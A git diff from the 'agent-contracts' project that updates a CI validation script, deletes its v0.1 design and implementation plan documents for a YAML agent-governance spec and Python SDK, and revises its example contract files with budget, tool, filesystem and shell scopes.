run: | + set -euo pipefail outcome="pass" + tier="" + verdict_outcome="" + for contract in ${{ inputs.contract }}; do echo "::group::Validating $contract" - result=$(aicontracts validate "$contract" -j) - if [ $? -eq 0 ]; then - tier=$(echo "$result" | python3 -c "import sys,json; print(json.load(sys.stdin)['tier'])") - echo "tier=$tier" >> "$GITHUB_OUTPUT" - else + result=$(python -m agent_contracts.cli validate "$contract" --json-output) + tier=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(data["tier"])') + recommendations=$(echo "$result" | python -c 'import json,sys; data=json.load(sys.stdin); print(len(data["recommendations"]))') + echo "$result" + echo "::endgroup::" + if [ "${{ inputs.fail-on-warning }}" = "true" ] && [ "$recommendations" -gt 0 ]; then outcome="fail" fi - echo "::endgroup::" done + + if [ -n "${{ inputs.verdict }}" ]; then + echo "::group::Checking verdict ${{ inputs.verdict }}" + extra_flag="" + if [ "${{ inputs.fail-on-warn-outcome }}" = "true" ]; then + extra_flag="--fail-on-warn" + fi + if ! 
python -m agent_contracts.cli check-verdict "${{ inputs.verdict }}" $extra_flag; then + outcome="fail" + fi + verdict_outcome=$(python -c 'import json,sys; print(json.load(open(sys.argv[1], encoding="utf-8"))["outcome"])' "${{ inputs.verdict }}") + echo "::endgroup::" + fi + + echo "tier=$tier" >> "$GITHUB_OUTPUT" echo "outcome=$outcome" >> "$GITHUB_OUTPUT" + echo "verdict_outcome=$verdict_outcome" >> "$GITHUB_OUTPUT" + if [ "$outcome" = "fail" ]; then exit 1 fi diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md b/docs/plans/2026-03-25-agent-contracts-v0.1-design.md deleted file mode 100644 index fb3af96..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md +++ /dev/null @@ -1,361 +0,0 @@ -# Agent Contracts v0.1 — Design Document - -## Metadata -- **Status:** Draft -- **Author:** Piyush Vyas -- **Date:** 2026-03-25 -- **Reviewers:** Claude quality-reviewer, Codex cross-reviewer -- **Complexity Tier:** Complex - ---- - -## Context & Problem Statement - -Production AI agents fail at 41–86.7% rates (MAST taxonomy, 1,642 traces across 7 frameworks). -97% of enterprises with agents in production cannot scale them. The dominant failure modes — -cost runaway, unauthorized tool use, missing audit trails, silent regressions — have no -framework-agnostic solution. - -MCP owns transport. LangChain/CrewAI own orchestration. Datadog/Langfuse own observability. -**No layer governs what an agent may do, must guarantee, and what happens when it fails.** - -Agent Contracts fills this gap: a YAML spec + validation SDK that enforces agent behavior -at the runtime boundary. The OpenAPI model — a machine-readable document that generates -tooling leverage. - -**Why now:** EU AI Act high-risk requirements take effect Aug 2026. HIPAA Security Rule update -makes AI handling ePHI subject to mandatory controls. The standards window closes in 12–18 months. - ---- - -## Goals - -1. 
**Define a YAML spec** (AGENT_CONTRACT.yaml) with 3 graduated tiers (Standalone → Enforceable → Composable) -2. **Ship a Python SDK** (`agent-contracts`) that validates contracts, enforces budgets/effects at runtime, and emits OTel-compatible violation events -3. **Ship a CLI** for validation, compatibility checking, contract generation from traces, and eval testing -4. **Ship framework adapters** for LangChain, CrewAI, and Pydantic AI (each <200 LOC, 3-line integration) -5. **Draft MCP extension proposal** (`x-agent-contract`) for tool-level contract metadata - -## Non-Goals - -1. **Not a protocol** — MCP owns transport; we layer policy above it -2. **Not a platform** — no hosted service, no vendor lock-in -3. **Not formal verification** — no theorem proving; executable assertions at Levels 2–3 -4. **No custom DSL** — YAML primary, CEL-like expressions for inline checks only -5. **No TypeScript SDK** in v0.1 (deferred to v0.1.x, 4–6 weeks post-launch) -6. **No contract registry** — premature infrastructure at zero adoption -7. **No inter-agent negotiation** — requires ecosystem maturity -8. **No taint tracking** — novel; deferred to v0.2 - ---- - -## Design - -### Option A: Monolithic SDK (Single Package, Everything Built-in) - -**Approach:** Single `agent-contracts` package containing spec schema, loader, validator, -enforcer, CLI, OTel emitter, composition checker, and all framework adapters. - -**Trade-offs:** -- Pro: Single install, single import, simpler dependency management -- Con: Pulls in framework deps (langchain, crewai, pydanticai) even if unused; bloated install - -**Complexity:** ~3000 LOC, 1 package, heavy deps - -### Option B: Modular Core + Optional Extras (Recommended) - -**Approach:** Core package (`agent-contracts`) with zero required framework deps. -Framework adapters as optional extras (`pip install agent-contracts[langchain]`). -CLI bundled in core. OTel as optional extra. 
- -**Trade-offs:** -- Pro: Minimal install footprint; framework deps only when needed; clean separation of concerns -- Pro: Each module testable independently; easier to maintain -- Con: Slightly more complex packaging (extras_require) - -**Complexity:** ~3500 LOC, 1 package with extras, minimal required deps (pyyaml, jsonschema) - -### Recommendation - -**Option B** — Modular Core + Optional Extras. Matches the plan's "standalone value first" strategy. -A developer gets `pip install agent-contracts` with zero framework baggage. Framework adapters -are opt-in. This mirrors how OpenTelemetry structures its packages. - ---- - -## Detailed Design - -### Package Structure - -``` -agent-contracts/ -├── pyproject.toml # Package config (hatch build system) -├── LICENSE # Apache-2.0 -├── README.md # Getting started, 5-minute contract -├── AGENT_CONTRACT.yaml # Reference example (support triage agent) -├── src/ -│ └── agent_contracts/ -│ ├── __init__.py # Public API surface -│ ├── py.typed # PEP 561 marker -│ ├── types.py # Core data models (dataclasses) -│ ├── schema.py # JSON Schema definitions (all 3 tiers) -│ ├── loader.py # YAML loading + schema validation -│ ├── tier.py # Tier assessment logic -│ ├── enforcer.py # Runtime enforcement (budgets, effects, schemas) -│ ├── effects.py # Effect authorization (default-deny allowlist) -│ ├── budgets.py # Budget tracking (cost, tokens, tool calls, duration) -│ ├── postconditions.py # Postcondition evaluation (sync/async/monitor) -│ ├── violations.py # Violation event creation + OTel emission -│ ├── composition.py # Contract Differential (schema/capability/budget gaps) -│ ├── cli.py # CLI entry point (click-based) -│ ├── init_from_trace.py # Generate contract skeleton from traces -│ ├── _version.py # Version constant -│ └── adapters/ -│ ├── __init__.py -│ ├── langchain.py # LangChain adapter (<200 LOC) -│ ├── crewai.py # CrewAI adapter (<200 LOC) -│ └── pydantic_ai.py # Pydantic AI adapter (<200 LOC) -├── schemas/ -│ └── 
agent-contract.schema.json # The JSON Schema (machine-readable spec) -├── spec/ -│ └── SPECIFICATION.md # Human-readable spec narrative -├── mcp/ -│ └── x-agent-contract.md # MCP extension proposal -├── examples/ -│ ├── support_triage.yaml # Tier 2 reference example -│ ├── simple_chatbot.yaml # Tier 0 minimal example -│ └── cost_controlled.yaml # Tier 1 budget-focused example -└── tests/ - ├── __init__.py - ├── conftest.py # Shared fixtures - ├── test_loader.py # Contract loading + validation - ├── test_tier.py # Tier assessment - ├── test_enforcer.py # Runtime enforcement - ├── test_effects.py # Effect authorization - ├── test_budgets.py # Budget tracking - ├── test_postconditions.py # Postcondition evaluation - ├── test_violations.py # Violation events - ├── test_composition.py # Contract Differential - ├── test_cli.py # CLI commands - ├── test_init_from_trace.py # Trace-based generation - └── test_adapters/ - ├── test_langchain.py - ├── test_crewai.py - └── test_pydantic_ai.py -``` - -### Core Data Models (`types.py`) - -```python -@dataclass(frozen=True) -class ContractIdentity: - name: str - version: str - -@dataclass(frozen=True) -class PostconditionDef: - name: str - check: str # CEL-like expression or "eval:judge" reference - enforcement: Literal["sync_block", "sync_warn", "async_monitor"] - severity: Literal["critical", "major", "minor"] - slo: SLODef | None = None - -@dataclass(frozen=True) -class EffectsAuthorized: - tools: list[str] # Allowlist (default: deny all) - network: list[str] # URL patterns - state_writes: list[str] # State scope patterns - -@dataclass(frozen=True) -class EffectsDeclared: - tools: list[str] # Actual effect footprint - network: list[str] - state_writes: list[str] - -@dataclass(frozen=True) -class ResourceBudgets: - max_cost_usd: float | None - max_tokens: int | None - max_tool_calls: int | None - max_duration_seconds: float | None - -@dataclass(frozen=True) -class Contract: - spec_version: str - identity: ContractIdentity - 
postconditions: list[PostconditionDef] - tier: int # Computed: 0, 1, or 2 - # Tier 1 - input_schema: dict | None - output_schema: dict | None - effects_authorized: EffectsAuthorized | None - budgets: ResourceBudgets | None - # Tier 2 - failure_model: dict | None - effects_declared: EffectsDeclared | None - delegation: DelegationRules | None - observability: ObservabilityConfig | None - versioning: VersioningConfig | None - slo: SLOConfig | None -``` - -### Enforcement Flow (`enforcer.py`) - -``` -Agent invocation - │ - ├─ PRE: validate input against input_schema (Tier 1) - │ - ├─ DURING: intercept each tool call - │ ├─ Check tool name against effects.authorized.tools (default: DENY) - │ ├─ Increment tool_call counter → check against max_tool_calls - │ ├─ Accumulate cost → check against max_cost_usd - │ ├─ Check elapsed time → check against max_duration_seconds - │ └─ On violation → emit OTel event, circuit-break or warn - │ - ├─ POST: validate output against output_schema (Tier 1) - │ ├─ Evaluate sync_block postconditions → block if failed - │ ├─ Evaluate sync_warn postconditions → warn if failed - │ └─ Queue async_monitor postconditions → evaluate async - │ - └─ EMIT: violation events (OTel-compatible) -``` - -Three usage patterns: -1. **Decorator:** `@enforce_contract("path/to/contract.yaml")` -2. **Context Manager:** `with ContractEnforcer(contract) as enforcer:` -3. 
**Explicit API:** `enforcer.check_tool_call(name, args)`, `enforcer.validate_output(data)` - -### Effect Authorization (`effects.py`) - -- **Default-deny:** If `effects.authorized.tools` is defined, only listed tools are allowed -- **Pattern matching:** Supports glob patterns (`database.*`, `api.user.*`) -- **Composition:** During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- **Audit:** Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` - -### Budget Enforcement (`budgets.py`) - -- Per-invocation counters: cost, tokens, tool_calls, elapsed time -- Thread-safe (uses threading.Lock for counter updates) -- Circuit breaker: when threshold hit, raises `BudgetExceededError` -- Cost tracking: accepts cost callbacks from the caller (we don't hardcode model prices) - -### Violation Events (`violations.py`) - -OTel-compatible structured events: -```python -@dataclass -class ViolationEvent: - contract_id: str - contract_version: str - violated_clause: str # e.g., "budgets.max_cost_usd" - evidence: dict # e.g., {"actual": 5.23, "limit": 5.00} - severity: str # "critical", "major", "minor" - enforcement: str # "blocked", "warned", "monitored" - trace_id: str | None - span_id: str | None - timestamp: str # ISO 8601 -``` - -Emitters: stdout (default), OTel SDK (when `opentelemetry-api` installed), callback. - -### Composition Checker (`composition.py`) - -Contract Differential between two Tier 2 contracts: -- **Schema gaps:** Input schema A not assignable to output schema B -- **Capability gaps:** A requires tools not authorized by B -- **Budget gaps:** A's budget exceeds B's budget -- **Effect validation:** A's declared effects not ⊆ B's authorized effects -- Returns structured report with compatibility verdict - -### CLI (`cli.py`) - -Built on `click`. 
Four commands: -- `validate`: Load contract, validate schema, report tier, recommend missing fields -- `check-compat`: Run composition checker between two contracts -- `init`: Generate contract skeleton from execution trace JSONL -- `test`: Run eval suite against contract postconditions - ---- - -## Security & Privacy Considerations - -- [x] **Default-deny effects** — tools not in allowlist are blocked before execution -- [x] **No prompt-level enforcement** — all enforcement at SDK layer (not bypassable via injection) -- [x] **Budget circuit breakers** — prevent cost runaway architecturally -- [x] **No secrets in contracts** — contracts are declarative policy, no credentials -- [x] **Input validation** — all YAML input validated against JSON Schema before processing -- [x] **No eval()** — CEL-like expressions parsed by a safe evaluator, never `eval()` -- [x] **Thread-safe counters** — budget enforcement is concurrency-safe -- [x] **Immutable data models** — `frozen=True` dataclasses prevent mutation after construction - ---- - -## Testing Strategy - -### Unit Tests -- Loader: valid/invalid YAML, schema validation errors, partial contracts -- Tier: correct tier classification for all combinations of fields -- Enforcer: tool call interception, budget tracking, input/output validation -- Effects: allowlist matching, glob patterns, default-deny, composition (intersection/union) -- Budgets: counter increments, threshold detection, thread safety -- Postconditions: sync_block/sync_warn/async_monitor evaluation -- Violations: event creation, OTel formatting, callback emission -- Composition: schema compatibility, capability gaps, budget gaps - -### Integration Tests -- Full enforcement flow: load contract → enforce agent invocation → collect violations -- CLI commands: validate, check-compat, init from sample traces -- Framework adapters: integration with mocked LangChain/CrewAI/Pydantic AI hooks - -### Test Coverage Target -- 90%+ line coverage on core modules (loader, 
enforcer, effects, budgets) -- 80%+ on adapters and CLI - ---- - -## Monitoring & Observability - -- **Built-in:** Violation events are the core observability primitive -- **OTel integration:** Events conform to OpenTelemetry semantic conventions -- **Metrics:** contract_satisfaction_rate, budget_utilization, effect_violations_total -- N/A for self-monitoring — this is the monitoring SDK, not a monitored service - ---- - -## Rollback Plan - -- [x] Change is revertable with `git revert` (all commits on feature branch) -- [x] No data migrations -- [x] Not applicable (new repo, no production deployment) -- [x] Rollback: `pip uninstall agent-contracts` - ---- - -## Dependencies & Risks - -### Required Dependencies (minimal) -- `pyyaml>=6.0` — YAML parsing -- `jsonschema>=4.20` — JSON Schema validation -- `click>=8.0` — CLI framework - -### Optional Dependencies -- `opentelemetry-api>=1.20` — OTel event emission -- `langchain-core>=0.2` — LangChain adapter -- `crewai>=0.50` — CrewAI adapter -- `pydantic-ai>=0.1` — Pydantic AI adapter - -### Risks -- **Adoption stalls at Tier 0** (medium) — mitigated by CLI nudges toward Tier 1 -- **CEL expression parser complexity** — mitigated by starting with simple comparisons only -- **Framework adapter API changes** — mitigated by pinning minimum versions, thin wrappers - ---- - -## Approval - -- [ ] Design reviewed by quality reviewer -- [ ] Design reviewed by cross-reviewer (DADS, Complex tier) -- [ ] Security considerations reviewed -- [ ] Testing strategy adequate for risk level diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md b/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md deleted file mode 100644 index 8617d75..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md +++ /dev/null @@ -1,165 +0,0 @@ -# Agent Contracts v0.1 — Implementation Plan - -## Goal -Build the Agent Contracts v0.1 project: YAML spec + Python SDK + CLI + framework adapters + MCP extension proposal. 
- -## Approach -Sequential implementation starting with the spec/schema foundation, then core SDK modules (bottom-up by dependency), CLI, adapters, and finally documentation/examples. Each task is independently committable and revertable. - -## File Inventory - -| File | Action | Task | -|------|--------|------| -| `pyproject.toml` | CREATE | T1 | -| `LICENSE` | CREATE | T1 | -| `src/agent_contracts/__init__.py` | CREATE | T1 | -| `src/agent_contracts/py.typed` | CREATE | T1 | -| `src/agent_contracts/_version.py` | CREATE | T1 | -| `schemas/agent-contract.schema.json` | CREATE | T2 | -| `src/agent_contracts/types.py` | CREATE | T3 | -| `src/agent_contracts/schema.py` | CREATE | T3 | -| `src/agent_contracts/loader.py` | CREATE | T4 | -| `src/agent_contracts/tier.py` | CREATE | T4 | -| `src/agent_contracts/effects.py` | CREATE | T5 | -| `src/agent_contracts/budgets.py` | CREATE | T5 | -| `src/agent_contracts/postconditions.py` | CREATE | T6 | -| `src/agent_contracts/violations.py` | CREATE | T6 | -| `src/agent_contracts/enforcer.py` | CREATE | T7 | -| `src/agent_contracts/composition.py` | CREATE | T8 | -| `src/agent_contracts/init_from_trace.py` | CREATE | T9 | -| `src/agent_contracts/cli.py` | CREATE | T9 | -| `src/agent_contracts/adapters/__init__.py` | CREATE | T10 | -| `src/agent_contracts/adapters/langchain.py` | CREATE | T10 | -| `src/agent_contracts/adapters/crewai.py` | CREATE | T10 | -| `src/agent_contracts/adapters/pydantic_ai.py` | CREATE | T10 | -| `examples/support_triage.yaml` | CREATE | T11 | -| `examples/simple_chatbot.yaml` | CREATE | T11 | -| `examples/cost_controlled.yaml` | CREATE | T11 | -| `AGENT_CONTRACT.yaml` | CREATE | T11 | -| `spec/SPECIFICATION.md` | CREATE | T12 | -| `mcp/x-agent-contract.md` | CREATE | T12 | -| `tests/conftest.py` | CREATE | T4 | -| `tests/test_loader.py` | CREATE | T4 | -| `tests/test_tier.py` | CREATE | T4 | -| `tests/test_effects.py` | CREATE | T5 | -| `tests/test_budgets.py` | CREATE | T5 | -| 
`tests/test_postconditions.py` | CREATE | T6 | -| `tests/test_violations.py` | CREATE | T6 | -| `tests/test_enforcer.py` | CREATE | T7 | -| `tests/test_composition.py` | CREATE | T8 | -| `tests/test_cli.py` | CREATE | T9 | -| `tests/test_init_from_trace.py` | CREATE | T9 | -| `tests/test_adapters/test_langchain.py` | CREATE | T10 | -| `tests/test_adapters/test_crewai.py` | CREATE | T10 | -| `tests/test_adapters/test_pydantic_ai.py` | CREATE | T10 | -| `README.md` | MODIFY | T13 | -| `.gitignore` | CREATE | T1 | -| `CLAUDE.md` | CREATE | T13 | - ---- - -## Tasks - -### T1: Project scaffolding and package configuration -- **What:** Create pyproject.toml (hatch build), LICENSE (Apache-2.0), .gitignore, package __init__.py, py.typed marker, _version.py -- **Files:** pyproject.toml, LICENSE, .gitignore, src/agent_contracts/__init__.py, src/agent_contracts/py.typed, src/agent_contracts/_version.py -- **LOC estimate:** ~120 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pip install -e ".[dev]" && python -c "import agent_contracts; print(agent_contracts.__version__)"` -- **Commit:** `build(project): scaffold package with pyproject.toml and Apache-2.0 license` -- **Rollback:** `git revert ` - -### T2: JSON Schema for AGENT_CONTRACT.yaml (all 3 tiers) -- **What:** Create the formal JSON Schema that defines the AGENT_CONTRACT.yaml format. Covers Tier 0 (identity + postconditions), Tier 1 (+ schemas, effects.authorized, budgets), Tier 2 (+ failure_model, effects.declared, delegation, observability, versioning, slo). Supports x- extensions and must-ignore unknown fields. 
-- **Files:** schemas/agent-contract.schema.json -- **LOC estimate:** ~280 -- **Verify:** `python -c "import json; s=json.load(open('schemas/agent-contract.schema.json')); print(s['title'])"` -- **Commit:** `feat(spec): add JSON Schema for AGENT_CONTRACT.yaml covering all 3 tiers` -- **Rollback:** `git revert ` - -### T3: Core data models and schema module -- **What:** Define frozen dataclasses for Contract, ContractIdentity, PostconditionDef, EffectsAuthorized, EffectsDeclared, ResourceBudgets, DelegationRules, ObservabilityConfig, VersioningConfig, SLOConfig, SLODef. Schema module loads and exposes the JSON Schema. -- **Files:** src/agent_contracts/types.py, src/agent_contracts/schema.py -- **LOC estimate:** ~250 -- **Verify:** `python -c "from agent_contracts.types import Contract, ResourceBudgets; print('OK')"` -- **Commit:** `feat(core): add typed data models and schema module` -- **Rollback:** `git revert ` - -### T4: Contract loader, tier assessor, and tests -- **What:** YAML loading with schema validation, tier assessment (classify as 0/1/2 based on fields present), recommendation engine for missing fields. Shared test fixtures. Tests for loader and tier. -- **Files:** src/agent_contracts/loader.py, src/agent_contracts/tier.py, tests/conftest.py, tests/test_loader.py, tests/test_tier.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pytest tests/test_loader.py tests/test_tier.py -v` -- **Commit:** `feat(core): add contract loader with schema validation and tier assessment` -- **Rollback:** `git revert ` - -### T5: Effect authorization and budget enforcement with tests -- **What:** Default-deny effect gating with glob pattern matching. Budget tracker with thread-safe counters, circuit breaker on threshold. Tests for both. 
-- **Files:** src/agent_contracts/effects.py, src/agent_contracts/budgets.py, tests/test_effects.py, tests/test_budgets.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_effects.py tests/test_budgets.py -v` -- **Commit:** `feat(core): add effect authorization (default-deny) and budget enforcement` -- **Rollback:** `git revert ` - -### T6: Postcondition evaluation and violation events with tests -- **What:** Postcondition evaluator supporting sync_block/sync_warn/async_monitor enforcement timing. Safe expression evaluator for CEL-like checks (no eval()). Violation event model (OTel-compatible). Event emitters: stdout, callback, optional OTel SDK. Tests. -- **Files:** src/agent_contracts/postconditions.py, src/agent_contracts/violations.py, tests/test_postconditions.py, tests/test_violations.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_postconditions.py tests/test_violations.py -v` -- **Commit:** `feat(core): add postcondition evaluation and OTel-compatible violation events` -- **Rollback:** `git revert ` - -### T7: Runtime enforcer (middleware) with tests -- **What:** ContractEnforcer class that wires together effects, budgets, postconditions, and violations into a unified enforcement flow. Supports decorator, context manager, and explicit API. Pre-call input validation, per-tool-call interception, post-call output validation. -- **Files:** src/agent_contracts/enforcer.py, tests/test_enforcer.py -- **LOC estimate:** ~250 -- **Verify:** `python -m pytest tests/test_enforcer.py -v` -- **Commit:** `feat(core): add runtime enforcer with decorator, context manager, and explicit API` -- **Rollback:** `git revert ` - -### T8: Composition checker (Contract Differential) with tests -- **What:** Given two Tier 2 contracts, compute schema gaps, capability gaps, budget gaps, effect validation (declared ⊆ authorized). Returns structured compatibility report. 
-- **Files:** src/agent_contracts/composition.py, tests/test_composition.py -- **LOC estimate:** ~200 -- **Verify:** `python -m pytest tests/test_composition.py -v` -- **Commit:** `feat(core): add composition checker with Contract Differential analysis` -- **Rollback:** `git revert ` - -### T9: CLI tool and trace-based init with tests -- **What:** Click-based CLI with 4 commands: validate, check-compat, init (from-trace), test. Trace parser reads JSONL execution traces and generates contract skeleton. Tests. -- **Files:** src/agent_contracts/cli.py, src/agent_contracts/init_from_trace.py, tests/test_cli.py, tests/test_init_from_trace.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m agent_contracts.cli validate examples/support_triage.yaml` (after T11) -- **Commit:** `feat(cli): add validate, check-compat, init, and test commands` -- **Rollback:** `git revert ` - -### T10: Framework adapters (LangChain, CrewAI, Pydantic AI) with tests -- **What:** Thin adapter wrappers (<200 LOC each) that map framework-specific hooks to the SDK's enforcement API. Each adapter enables 3-line contract enforcement integration. Tests with mocked framework interfaces. -- **Files:** src/agent_contracts/adapters/__init__.py, src/agent_contracts/adapters/langchain.py, src/agent_contracts/adapters/crewai.py, src/agent_contracts/adapters/pydantic_ai.py, tests/test_adapters/test_langchain.py, tests/test_adapters/test_crewai.py, tests/test_adapters/test_pydantic_ai.py -- **LOC estimate:** ~300 (adapters) + ~200 (tests) -- **Verify:** `python -m pytest tests/test_adapters/ -v` -- **Commit:** `feat(adapters): add LangChain, CrewAI, and Pydantic AI framework adapters` -- **Rollback:** `git revert ` - -### T11: Reference examples and root contract -- **What:** Create example AGENT_CONTRACT.yaml files: support_triage (Tier 2, full), simple_chatbot (Tier 0, minimal), cost_controlled (Tier 1, budget-focused). 
Root AGENT_CONTRACT.yaml as the canonical reference. All must pass schema validation. -- **Files:** AGENT_CONTRACT.yaml, examples/support_triage.yaml, examples/simple_chatbot.yaml, examples/cost_controlled.yaml -- **LOC estimate:** ~200 -- **Verify:** `python -m agent_contracts.cli validate AGENT_CONTRACT.yaml && python -m agent_contracts.cli validate examples/support_triage.yaml` -- **Commit:** `docs(examples): add reference AGENT_CONTRACT.yaml files for all 3 tiers` -- **Rollback:** `git revert ` - -### T12: Specification narrative and MCP extension proposal -- **What:** Human-readable spec document explaining each field, the tier system, breaking change rules, and CEL expression syntax. MCP extension proposal for x-agent-contract on tool definitions. -- **Files:** spec/SPECIFICATION.md, mcp/x-agent-contract.md -- **LOC estimate:** ~250 -- **Verify:** Manual review — documents should be complete and accurate -- **Commit:** `docs(spec): add human-readable specification and MCP extension proposal` -- **Rollback:** `git revert ` - -### T13: README, CLAUDE.md, and public API surface -- **What:** Getting-started README with 5-minute contract experience, quick examples, API reference. CLAUDE.md for repo conventions. Polish __init__.py public exports. -- **Files:** README.md, CLAUDE.md, src/agent_contracts/__init__.py -- **LOC estimate:** ~200 -- **Verify:** `python -c "from agent_contracts import Contract, ContractEnforcer, load_contract, validate_contract; print('Public API OK')"` -- **Commit:** `docs(readme): add getting-started guide and CLAUDE.md conventions` -- **Rollback:** `git revert ` diff --git a/examples/cost_controlled.yaml b/examples/cost_controlled.yaml index 65b1868..7fc438a 100644 --- a/examples/cost_controlled.yaml +++ b/examples/cost_controlled.yaml @@ -1,13 +1,12 @@ # Tier 1 — Enforceable Contract -# Adds cost control, tool-use security, and input/output validation. -# The SDK can enforce these at the boundary. 
+# Adds cost control plus coding/build shell and file scopes. agent_contract: "0.1.0" identity: name: cost-controlled-researcher - version: "1.2.0" - description: A research agent with strict cost and tool-use controls. + version: "0.1.0" + description: Research helper with strict spend and execution controls. contract: postconditions: @@ -20,21 +19,15 @@ contract: check: "len(output.sources) > 0" enforcement: sync_warn severity: major - description: Research output should include at least one source. inputs: schema: type: object - required: - - query + required: [query] properties: query: type: string minLength: 1 - max_results: - type: integer - minimum: 1 - maximum: 50 outputs: schema: @@ -46,25 +39,22 @@ outputs: type: array items: type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: - tools: - - web_search - - document_reader - - summarizer - network: - - "https://api.search-provider.com/*" - - "https://docs.example.com/*" + tools: [web_search, document_reader, summarizer] + network: ["https://api.search-provider.com/*", "https://docs.example.com/*"] state_writes: [] + filesystem: + read: ["docs/**", "README.md"] + write: ["notes/**"] + shell: + commands: ["python -m pytest *"] resources: budgets: max_cost_usd: 0.50 max_tokens: 15000 max_tool_calls: 10 + max_shell_commands: 2 max_duration_seconds: 60.0 diff --git a/examples/demo_blocked_command.yaml b/examples/demo_blocked_command.yaml new file mode 100644 index 0000000..9a3025a --- /dev/null +++ b/examples/demo_blocked_command.yaml @@ -0,0 +1,29 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-command-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_shell_commands: 3 + +observability: 
+ run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_blocked_file_write.yaml b/examples/demo_blocked_file_write.yaml new file mode 100644 index 0000000..285f5c2 --- /dev/null +++ b/examples/demo_blocked_file_write.yaml @@ -0,0 +1,24 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-file-write-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**"] + write: ["src/**"] + tools: [] + network: [] + state_writes: [] + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_failed_checks.yaml b/examples/demo_failed_checks.yaml new file mode 100644 index 0000000..350fee9 --- /dev/null +++ b/examples/demo_failed_checks.yaml @@ -0,0 +1,15 @@ +agent_contract: "0.1.0" + +identity: + name: failed-checks-demo + version: "0.1.0" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/repo_build_agent.yaml b/examples/repo_build_agent.yaml new file mode 100644 index 0000000..9f33554 --- /dev/null +++ b/examples/repo_build_agent.yaml @@ -0,0 +1,41 @@ +agent_contract: "0.1.0" + +identity: + name: repo-build-agent + version: "0.1.0" + description: Repo-local coding/build agent with bounded file and shell scope. 
+ +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/simple_chatbot.yaml b/examples/simple_chatbot.yaml index ee46077..ed114d2 100644 --- a/examples/simple_chatbot.yaml +++ b/examples/simple_chatbot.yaml @@ -1,13 +1,11 @@ # Tier 0 — Minimal Valid Contract -# A developer gets value from writing this even if nothing else reads it. -# 4 fields. Adopt in 5 minutes. No runtime required. agent_contract: "0.1.0" identity: name: simple-chatbot - version: "1.0.0" - description: A basic conversational chatbot with a single quality guarantee. + version: "0.1.0" + description: Basic chatbot with one non-null response guarantee. contract: postconditions: @@ -15,4 +13,3 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: The chatbot must always produce a non-null response. diff --git a/examples/support_triage.yaml b/examples/support_triage.yaml index 7ba7fdd..56597a7 100644 --- a/examples/support_triage.yaml +++ b/examples/support_triage.yaml @@ -1,16 +1,11 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. 
+# Tier 2 — Composable Contract (retained broader example) agent_contract: "0.1.0" identity: name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. + version: "0.1.0" + description: Triages incoming support tickets with explicit safety and audit hooks. authors: - Piyush Vyas @@ -20,39 +15,24 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. - name: valid_priority check: 'output.priority in ["critical", "high", "medium", "low"]' enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - name: has_routing check: 'output.routed_to is not None' enforcement: sync_warn severity: major - description: Should route to a team (warn if not). slo: target_rate: 0.99 window: "24h" - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - inputs: schema: type: object - required: - - ticket_id - - subject - - body + required: [ticket_id, subject, body] properties: ticket_id: type: string @@ -60,31 +40,22 @@ inputs: type: string body: type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string preconditions: - name: ticket_not_empty check: "len(input.body) > 0" - description: Ticket body must not be empty. 
